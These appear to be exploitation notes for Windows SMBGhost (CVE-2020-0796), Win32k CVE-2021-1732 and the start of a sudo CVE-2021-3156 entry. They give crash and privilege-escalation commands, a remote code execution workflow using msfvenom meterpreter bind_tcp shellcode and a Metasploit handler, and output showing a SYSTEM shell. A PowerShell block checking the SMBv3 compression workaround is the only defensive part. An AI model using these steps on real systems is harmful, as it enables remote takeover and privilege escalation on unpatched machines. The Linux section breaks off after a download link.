Windows
Windows SMB remote code execution vulnerability CVE-2020-0796 (privilege escalation, remote RCE)
Affected versions
SMB version v3.1.1
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
Reproduction
Download the image from MSDN
1. Probe with Qianxin's vulnerability scanner
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
2. Blue screen (BSOD)
python3 CVE-2020-0796.py 192.168.170.137
3. Local privilege escalation exploit
After running the application, the cmd window that pops up runs with SYSTEM privileges: https://github.com/danigargu/CVE-2020-0796
# windows
CVE-2020-0796 本地提权EXP\cve-2020-0796-local > cve-2020-0796-local.exe
# msf
run exploit/windows/local/cve_2020_0796_smbghost
4. CVE-2020-0796 remote exploit code:
# Generate the (bind_tcp) shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py
# Replace the shellcode in exploit.py with the shellcode from the generated exp.py; the variable buf must be renamed to USER_PAYLOAD
# msf
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2333
set rhost 192.168.170.137
exploit
# Run the script
python3 exploit.py -ip 192.168.170.137
In testing, it only worked with Windows Defender turned off.
Note: if the listener never receives a shell, just run it once more.
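As an added defensive check (not part of the original notes): the script below reports whether the server-side SMBv3 compression workaround Microsoft published for CVE-2020-0796 (the DisableCompression registry value) is in place, and can apply it. It assumes an elevated PowerShell session on the host being checked.

```powershell
# Added example, not from the original notes. Checks and optionally applies
# the CVE-2020-0796 workaround: disabling SMBv3 compression on the SMB server.
# Requires an elevated session; no reboot is needed for this value.
$LanmanServerParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smbv3CompressionState {
    # Returns 'Mitigated' when DisableCompression is set to 1, otherwise 'Exposed'.
    $item = Get-ItemProperty -Path $LanmanServerParams -Name DisableCompression -ErrorAction SilentlyContinue
    if ($null -ne $item -and $item.DisableCompression -eq 1) { 'Mitigated' } else { 'Exposed' }
}

function Set-Smbv3CompressionDisabled {
    # Applies the workaround by writing DisableCompression = 1 (REG_DWORD).
    Set-ItemProperty -Path $LanmanServerParams -Name DisableCompression -Type DWORD -Value 1 -Force
}

# Only Windows 10 / Server builds 1903 (18362) and 1909 (18363) carry the
# vulnerable compression code path; on other builds the check is harmless.
$build = [System.Environment]::OSVersion.Version.Build
$state = Get-Smbv3CompressionState
Write-Host "Build $build - SMBv3 compression workaround: $state"

if ($state -eq 'Exposed' -and $build -in 18362, 18363) {
    Set-Smbv3CompressionDisabled
    Write-Host "Workaround applied; state is now: $(Get-Smbv3CompressionState)"
}
```

The workaround only covers the SMB server role; installing the security update remains the actual fix, and the value can be reverted once the host is patched.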
Windows Win32k local privilege escalation vulnerability CVE-2021-1732
Affected versions
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
Usage:
C:\Users\itsme\Desktop> CVE-2021-1732.exe whoami
请按任意键继续. . .
CreateWnd
Hwnd:000403ac qwfirstEntryDesktop=0000028EE8B06470
BaseAddress:0000028EE8B06000 RegionSize=:0000000000016000
Hwnd:00020354 qwfirstEntryDesktop=0000028EE8B11190
BaseAddress:0000028EE8B11000 RegionSize=:000000000000B000
Hwnd:00020356 qwfirstEntryDesktop=0000028EE8B06790
... ...
qwFrist read=FFFFFD4404E6E7E0
qwSecond read=FFFF9D08390F10D0
qwSecond read=FFFFFD4401200000
qwFourth read=FFFFFD4402ECC220
qwFifth read=FFFF9D083B2AA080
qwSixth read=FFFF9D0839B44080
[*] Trying to execute whoami as SYSTEM
[+] ProcessCreated with pid 1512!
===============================
nt authority\system
Linux
Linux sudo privilege escalation vulnerability CVE-2021-3156
Download Ubuntu
http://mirrors.melbourne.co.uk/ubuntu-releases/20.04/